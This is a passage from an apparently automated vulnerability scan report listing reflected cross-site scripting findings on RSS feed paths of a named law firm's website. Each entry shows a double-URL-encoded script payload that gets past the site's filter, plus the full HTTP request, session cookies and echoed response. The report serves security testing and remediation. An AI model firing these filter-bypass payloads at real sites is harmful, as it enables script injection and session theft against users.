The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb was submitted in the REST URL parameter 4. This input was echoed as 9c8b4"><script>alert(1)</script>4f8e8ef06bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Government_Contracts/rss.xml9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Government_Contracts/rss.xml9c8b4"><script>alert(1)</script>4f8e8ef06bb" value="">
...[SNIP]...

2.182. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86 was submitted in the REST URL parameter 1. This input was echoed as 86cb4"><script>alert(1)</script>fd584c5ec86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86/practices/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss86cb4"><script>alert(1)</script>fd584c5ec86/practices/Health_Care/rss.xml" value="">
...[SNIP]...

2.183. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf was submitted in the REST URL parameter 2. This input was echoed as cc67c"><script>alert(1)</script>d7658866ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicescc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicescc67c"><script>alert(1)</script>d7658866ddf/Health_Care/rss.xml" value="">
...[SNIP]...

2.184. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4 was submitted in the REST URL parameter 3. This input was echoed as f87dc"><script>alert(1)</script>ee3d1a37ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Health_Caref87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Health_Caref87dc"><script>alert(1)</script>ee3d1a37ca4/rss.xml" value="">
...[SNIP]...

2.185. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 was submitted in the REST URL parameter 4. This input was echoed as f1cbf"><script>alert(1)</script>efc92306738 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Health_Care/rss.xmlf1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Health_Care/rss.xmlf1cbf"><script>alert(1)</script>efc92306738" value="">
...[SNIP]...

2.186. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532 was submitted in the REST URL parameter 1. This input was echoed as 7953a"><script>alert(1)</script>a4cf2c1a532 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532/practices/Insurance/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss7953a"><script>alert(1)</script>a4cf2c1a532/practices/Insurance/rss.xml" value="">
...[SNIP]...

2.187. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e was submitted in the REST URL parameter 2. This input was echoed as a0999"><script>alert(1)</script>5bd9f5471e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesa0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e/Insurance/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesa0999"><script>alert(1)</script>5bd9f5471e/Insurance/rss.xml" value="">
...[SNIP]...

2.188. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e was submitted in the REST URL parameter 3. This input was echoed as a3861"><script>alert(1)</script>021aa92fc8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Insurancea3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Insurancea3861"><script>alert(1)</script>021aa92fc8e/rss.xml" value="">
...[SNIP]...

2.189. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 was submitted in the REST URL parameter 4. This input was echoed as dc903"><script>alert(1)</script>8c3f9de4a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Insurance/rss.xmldc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Insurance/rss.xmldc903"><script>alert(1)</script>8c3f9de4a75" value="">
...[SNIP]...

2.190. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708 was submitted in the REST URL parameter 1. This input was echoed as a8cc0"><script>alert(1)</script>97bf63e9708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssa8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708/practices/Intellectual_Property/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssa8cc0"><script>alert(1)</script>97bf63e9708/practices/Intellectual_Property/rss.xml" value="">
...[SNIP]...

2.191. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035 was submitted in the REST URL parameter 2. This input was echoed as ebee6"><script>alert(1)</script>8cb5eed4035 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035/Intellectual_Property/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesebee6"><script>alert(1)</script>8cb5eed4035/Intellectual_Property/rss.xml" value="">
...[SNIP]...

2.192. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c was submitted in the REST URL parameter 3. This input was echoed as 9a6c9"><script>alert(1)</script>f1282db072c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Intellectual_Property9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Intellectual_Property9a6c9"><script>alert(1)</script>f1282db072c/rss.xml" value="">
...[SNIP]...

2.193. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa was submitted in the REST URL parameter 4. This input was echoed as f7748"><script>alert(1)</script>1dd7e1a93aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Intellectual_Property/rss.xmlf7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Intellectual_Property/rss.xmlf7748"><script>alert(1)</script>1dd7e1a93aa" value="">
...[SNIP]...

2.194. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76 was submitted in the REST URL parameter 1. This input was echoed as d092e"><script>alert(1)</script>1334ddb4b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssd092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76/practices/International_Trade/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssd092e"><script>alert(1)</script>1334ddb4b76/practices/International_Trade/rss.xml" value="">
...[SNIP]...

2.195. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce was submitted in the REST URL parameter 2. This input was echoed as d46e9"><script>alert(1)</script>f30c22f14ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesd46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce/International_Trade/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
